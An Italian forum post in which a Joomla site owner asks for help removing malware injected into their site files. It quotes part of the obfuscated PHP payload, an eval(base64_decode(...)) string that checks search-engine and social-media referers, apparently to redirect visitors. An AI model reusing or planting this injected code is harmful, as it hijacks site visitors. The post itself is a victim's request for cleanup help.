Direte: ecco l'ennesimo attaccato dal Malware.
L'ho scoperto oggi dopo che google me lo ha comunicato. (ma il fatto risale al 11 gennaio scorso)
Il server che mi ospita (joomlahost) mi ha detto che alcuni file contengono questa stringa:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1 oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew 0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGR VJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VT RVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZ lcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZm VyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlc mVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVm ZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmV yZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZW ZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZ mVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVm ZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJ lZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb 3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikg b3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5 jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC 5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbS
Ho aperto e pulito tutti quelli presenti nella cartella Includes come indicatomi ma facendo la scansione con il programma online risulta che il codice è ancora presente.
Il mio backup risale a Aprile 2012 e se ripristino da questo, perdo tutto il lavoro che sto facendo sul Jupgrade.
Che faccio? urge un aiuto colossale sennò stasera mi suicido!
Grazie a tutti